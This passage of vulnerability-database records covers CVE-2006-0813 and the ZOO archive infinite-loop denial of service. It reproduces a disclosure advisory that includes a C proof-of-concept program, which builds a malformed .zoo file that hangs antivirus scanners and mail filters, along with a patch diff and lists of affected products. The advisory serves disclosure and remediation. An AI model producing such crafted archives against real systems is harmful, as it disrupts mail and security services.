          "value": "Heap-based buffer overflow in WinACE 2.60 allows user-assisted attackers to execute arbitrary code via a large header block in an ARJ archive."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-18T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "ADV-2006-0709",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/0709"
        },
        {
          "name": "17251",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/17251"
        },
        {
          "name": "23383",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/23383"
        },
        {
          "name": "20060223 Secunia Research: WinACE ARJ Archive Handling Buffer Overflow",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/425894/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2005-67/advisory/"
        },
        {
          "name": "1015672",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1015672"
        },
        {
          "name": "16786",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/16786"
        },
        {
          "name": "479",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/479"
        },
        {
          "name": "winace-arj-header-bo(24872)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24872"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-0813",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Heap-based buffer overflow in WinACE 2.60 allows user-assisted attackers to execute arbitrary code via a large header block in an ARJ archive."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ADV-2006-0709",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/0709"
            },
            {
              "name": "17251",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/17251"
            },
            {
              "name": "23383",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/23383"
            },
            {
              "name": "20060223 Secunia Research: WinACE ARJ Archive Handling Buffer Overflow",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/425894/100/0/threaded"
            },
            {
              "name": "http://secunia.com/secunia_research/2005-67/advisory/",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2005-67/advisory/"
            },
            {
              "name": "1015672",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1015672"
            },
            {
              "name": "16786",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/16786"
            },
            {
              "name": "479",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/479"
            },
            {
              "name": "winace-arj-header-bo(24872)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24872"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-0813",
    "datePublished": "2006-02-24T11:00:00",
    "dateReserved": "2006-02-21T00:00:00",
    "dateUpdated": "2024-08-07T16:48:56.179Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

var-200705-0187
Vulnerability from variot

unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic: Multiple vendors ZOO file decompression infinite loop DoS

Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673

I. BACKGROUND

Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension.

II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition.

III. AFFECTED SOFTWARES

o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip

IV. IMPACT

If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests.

If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server.

V. SOLUTION

o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007.

o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007.

o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007.

o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007.

o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software.

o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software.

o WinAce was contacted but no response was received from them.

o PicoZip was contacted but no response was received from them.

VI. PROOF OF CONCEPT

Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability.

Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed.

/*

Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS

coded by Jean-S\xe9bastien Guay-Leroux September 2006

*/

include

include

include

// Structure of a ZOO header

define ZOO_HEADER_SIZE 0x0000002a

define ZH_TEXT 0

define ZH_TAG 20

define ZH_START_OFFSET 24

define ZH_NEG_START_OFFSET 28

define ZH_MAJ_VER 32

define ZH_MIN_VER 33

define ZH_ARC_HTYPE 34

define ZH_ARC_COMMENT 35

define ZH_ARC_COMMENT_LENGTH 39

define ZH_VERSION_DATA 41

define D_DIRENTRY_LENGTH 56

define D_TAG 0

define D_TYPE 4

define D_PACKING_METHOD 5

define D_NEXT_ENTRY 6

define D_OFFSET 10

define D_DATE 14

define D_TIME 16

define D_FILE_CRC 18

define D_ORIGINAL_SIZE 20

define D_SIZE_NOW 24

define D_MAJ_VER 28

define D_MIN_VER 29

define D_DELETED 30

define D_FILE_STRUCT 31

define D_COMMENT_OFFSET 32

define D_COMMENT_SIZE 36

define D_FILENAME 38

define D_VAR_DIR_LEN 51

define D_TIMEZONE 53

define D_DIR_CRC 54

define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )

define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )

define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )

void put_byte (char ptr, unsigned char data) { ptr = data; }

void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); }

void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); }

FILE * open_file (char *filename) {

     FILE *fp;

     fp = fopen ( filename , "w" );

     if (!fp) {
             perror ("Cant open file");
             exit (1);
     }

     return fp;

}

void usage (char *progname) {

     printf ("\nTo use:\n");
     printf ("%s <archive name>\n\n", progname);

     exit (1);

}

int main (int argc, char argv[]) { FILE fp; char hdr = (char ) malloc (4096); char filename = (char ) malloc (256); int written_bytes; int total_size;

     if ( argc != 2) {
             usage ( argv[0] );
     }

     strncpy (filename, argv[1], 255);

     if (!hdr || !filename) {
             perror ("Error allocating memory");
             exit (1);
     }

     memset (hdr, 0x00, 4096);

     // Build a ZOO header
     memcpy          (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
     put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);
     put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
     put_longword    (hdr + ZH_NEG_START_OFFSET,
         (ZOO_HEADER_SIZE) * -1);
     put_byte        (hdr + ZH_MAJ_VER, 2);
     put_byte        (hdr + ZH_MIN_VER, 0);
     put_byte        (hdr + ZH_ARC_HTYPE, 1);
     put_longword    (hdr + ZH_ARC_COMMENT, 0);
     put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);
     put_byte        (hdr + ZH_VERSION_DATA, 3);

     // Build vulnerable direntry struct
     put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
     put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
     put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
     put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
     put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
     memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,
                         "AAAAAAAA.AAA", 13);

     total_size = ZOO_HEADER_SIZE + 51;

     fp = open_file (filename);

     if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
             printf ("The file has been written\n");
     } else {
             printf ("Cant write to the file\n");
             exit (1);
     }

     fclose (fp);

     return 0;

}

VII. PATCH

To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems:

diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; / directory entry / int first_dir = 1; / first dir entry seen? / +unsigned long zoo_pointer = 0; / Track our position in the file /

static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); / seek to where data begins / + + / Begin tracking our position in the file / + zoo_pointer = zoo_header.zoo_start; }

#ifndef PORTABLE @@ -597,6 +601,12 @@ } / end if /

loop_again: + + / Make sure we are not seeking to already processed data / + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); / ..seek to next dir entry / } / end while /

diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; / show file protection / #endif int first_dir = 1; / if first direntry -- to adjust dat_ofs / +unsigned long zoo_pointer = 0; / Track our position in the file /

while (option) { switch (option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); / show archive comment / }

  • / Begin tracking our position in the file /
  • zoo_pointer = zoo_header.zoo_start; + / Seek to the beginning of the first directory entry / if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char ) NULL); } / end if (lots of conditions) */ +
  • / Make sure we are not seeking to already processed data /
  • if (direntry.next <= zoo_pointer)
  • prterror ('f', "ZOO chain structure is corrupted\n");
  • zoo_pointer = direntry.next;
             /* ..seek to next dir entry */
    zooseek (zoo_file, direntry.next, 0);
    

VIII. CREDITS

Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.

IX. REFERENCES

  1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669

  2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670

  3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671

  4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672

  5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673

X. HISTORY

2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200705-0187",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "amavis",
        "scope": "lte",
        "trust": 1.8,
        "vendor": "amavis",
        "version": "2.4.1"
      },
      {
        "model": "antivir personal",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "avira",
        "version": "7"
      },
      {
        "model": "antivir",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "avira",
        "version": "6.35.00.00"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.0"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "barracuda",
        "version": "model_900"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "barracuda",
        "version": "model_400"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.1098"
      },
      {
        "model": "antivirus",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.980"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "barracuda",
        "version": "model_800"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.844"
      },
      {
        "model": "antivirus and firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "panda",
        "version": "2007"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6.691"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.869"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6.652"
      },
      {
        "model": "zoo",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "rahul dhesi",
        "version": "2.10"
      },
      {
        "model": "antivirus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6.394"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6.665"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6"
      },
      {
        "model": "picozip",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "picozip",
        "version": "*"
      },
      {
        "model": "antivir personal",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avira",
        "version": "*"
      },
      {
        "model": "unzoo",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "unzoo",
        "version": "4.4"
      },
      {
        "model": "winace",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "winace",
        "version": "*"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.1098"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6.603"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.827"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.1043"
      },
      {
        "model": "antivir personal",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "avira",
        "version": "7.3.0.5"
      },
      {
        "model": "antivir",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avira",
        "version": "7.04.00.23"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "barracuda",
        "version": "model_200"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6.691"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.844"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.869"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "barracuda",
        "version": "model_100"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6.665"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "barracuda",
        "version": "model_500"
      },
      {
        "model": "antivirus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "panda",
        "version": "2007"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.0"
      },
      {
        "model": "antivir",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avira",
        "version": "*"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "barracuda",
        "version": "model_600"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.827"
      },
      {
        "model": "antivirus professional",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.1043"
      },
      {
        "model": "antivirus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.700"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6.655"
      },
      {
        "model": "antivirus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.7.652"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "barracuda",
        "version": "model_300"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "barracuda",
        "version": "*"
      },
      {
        "model": "antivirus home",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avast",
        "version": "4.6.652"
      },
      {
        "model": "activescan",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "panda",
        "version": "5.53"
      },
      {
        "model": "antivir personal",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "avira",
        "version": "7.3.0.5"
      },
      {
        "model": "zoo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "zoo",
        "version": "2.10"
      },
      {
        "model": "winace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winace",
        "version": "2.605"
      },
      {
        "model": "winace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winace",
        "version": "2.5"
      },
      {
        "model": "winace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winace",
        "version": "2.60"
      },
      {
        "model": "unzoo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "unzoo",
        "version": "4.4-2"
      },
      {
        "model": "picozip",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "picozip",
        "version": "4.0.2"
      },
      {
        "model": "picozip",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "picozip",
        "version": "4.0.1"
      },
      {
        "model": "titanium antivirus antispyware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2006+"
      },
      {
        "model": "titanium antivirus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2005"
      },
      {
        "model": "platinum internet security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "20070"
      },
      {
        "model": "platinum internet security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2006"
      },
      {
        "model": "antivirus platinum",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2.0"
      },
      {
        "model": "antivirus for netware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2.0"
      },
      {
        "model": "activescan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "5.54.1"
      },
      {
        "model": "activescan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "5.0"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.15026"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.1.18"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.1.17"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.055"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.053"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.022"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.01.001"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.0.54"
      },
      {
        "model": "desktop for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "1.00.00.68"
      },
      {
        "model": "antivir workstation professional build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "367"
      },
      {
        "model": "antivir personaledition premium build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "228"
      },
      {
        "model": "antivir personaledition classic build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "180"
      },
      {
        "model": "avast! linux home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "1.0.5"
      },
      {
        "model": "avast! linux home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "1.0.5-1"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.726"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.676"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.660"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.566"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.489"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.460"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.844"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.827"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.691"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.665"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.652"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.603"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.0"
      },
      {
        "model": "antivirus managed client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.394"
      },
      {
        "model": "antivirus managed client",
        "scope": null,
        "trust": 0.3,
        "vendor": "avast",
        "version": null
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.869"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.844"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.827"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.691"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.665"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.655"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.652"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1673"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-118"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
